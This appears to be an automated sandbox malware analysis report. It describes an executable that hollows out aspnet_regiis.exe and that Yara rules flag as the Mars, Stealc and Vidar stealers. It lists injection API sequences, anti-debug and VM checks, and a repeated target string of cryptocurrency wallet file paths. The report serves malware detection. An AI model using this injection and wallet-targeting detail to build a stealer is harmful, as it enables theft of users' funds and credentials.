Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_027621F0 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,	2_2_027621F0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Code function: 2_2_027647B0 GetSystemInfo,wsprintfA,

2_2_027647B0

Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Source: aspnet_regiis.exe, 00000002.00000002.1806482282.0000000002C03000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW/
Source: aspnet_regiis.exe, 00000002.00000002.1806482282.0000000002BD7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWp
Source: aspnet_regiis.exe, 00000002.00000002.1806482282.0000000002BA7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: aspnet_regiis.exe, 00000002.00000002.1806482282.0000000002C03000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	API call chain: ExitProcess graph end node	graph_2-75788
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	API call chain: ExitProcess graph end node	graph_2-76820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	API call chain: ExitProcess graph end node	graph_2-75785
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	API call chain: ExitProcess graph end node	graph_2-75799
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	API call chain: ExitProcess graph end node	graph_2-75805
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	API call chain: ExitProcess graph end node	graph_2-75806
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	API call chain: ExitProcess graph end node	graph_2-75629
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	API call chain: ExitProcess graph end node	graph_2-75828

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe

Code function: 0_2_6CC2A87A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_6CC2A87A

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

2_2_02766230

Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe	Code function: 0_2_6CC521B0 mov eax, dword ptr fs:[00000030h]		0_2_6CC521B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_02765DB0 mov eax, dword ptr fs:[00000030h]		2_2_02765DB0

Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe

Code function: 0_2_6CC305EB GetProcessHeap,

0_2_6CC305EB

Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe	Code function: 0_2_6CC2A87A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_6CC2A87A
Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe	Code function: 0_2_6CC2E817 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_6CC2E817
Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe	Code function: 0_2_6CC2A3A1 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_6CC2A3A1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_02767B3E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_02767B3E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_027673CD memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_027673CD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_02769DB7 SetUnhandledExceptionFilter,	2_2_02769DB7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_6C2DB66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_6C2DB66C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_6C2DB1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_6C2DB1F7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_6C48AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_6C48AC62

Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe

Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2750000 protect: page execute and read and write

Jump to behavior

Contains functionality to inject code into remote processes

Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe

Code function: 0_2_6CC22FB0 HonorInc,GetConsoleWindow,ShowWindow,CreateProcessW,VirtualAlloc,Wow64GetThreadContext,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,ReadProcessMemory,WriteProcessMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,CloseHandle,CloseHandle,GetThreadContext,

0_2_6CC22FB0

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2750000 value starts with: 4D5A

Jump to behavior

Searches for specific processes (likely to inject)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Code function: 2_2_02765CF0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,

2_2_02765CF0

Writes to foreign memory regions

Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2750000	Jump to behavior
Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2751000	Jump to behavior
Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 276B000	Jump to behavior
Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2773000	Jump to behavior
Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2986000	Jump to behavior
Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 25AB008	Jump to behavior

Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe

Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"

Jump to behavior

Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe

Code function: 0_2_6CC2AA38 cpuid

0_2_6CC2AA38

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,

2_2_02764560

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe	Queries volume information: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe

Code function: 0_2_6CC2A4C3 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_6CC2A4C3

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Code function: 2_2_027643B0 GetProcessHeap,RtlAllocateHeap,GetUserNameA,

2_2_027643B0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Code function: 2_2_027644A0 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,

2_2_027644A0

Stealing of Sensitive Information

Yara detected Mars stealer

Source: Yara match	File source: 2.2.aspnet_regiis.exe.2750000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.aspnet_regiis.exe.2750000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc20000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1699865852.000000006CC3D000.00000004.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1805843043.0000000002750000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Yara detected Stealc

Source: Yara match	File source: 00000002.00000002.1806482282.0000000002BA7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: aspnet_regiis.exe PID: 7596, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: 2.2.aspnet_regiis.exe.2750000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.aspnet_regiis.exe.2750000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc20000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1699865852.000000006CC3D000.00000004.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1805843043.0000000002750000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: aspnet_regiis.exe PID: 7596, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: aspnet_regiis.exe, 00000002.00000002.1805898041.0000000002899000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: aspnet_regiis.exe, 00000002.00000002.1805898041.0000000002899000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: aspnet_regiis.exe, 00000002.00000002.1805898041.0000000002899000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: aspnet_regiis.exe, 00000002.00000002.1805898041.0000000002899000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: aspnet_regiis.exe, 00000002.00000002.1805898041.0000000002899000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: aspnet_regiis.exe, 00000002.00000002.1805898041.0000000002899000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: aspnet_regiis.exe, 00000002.00000002.1805898041.0000000002899000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local 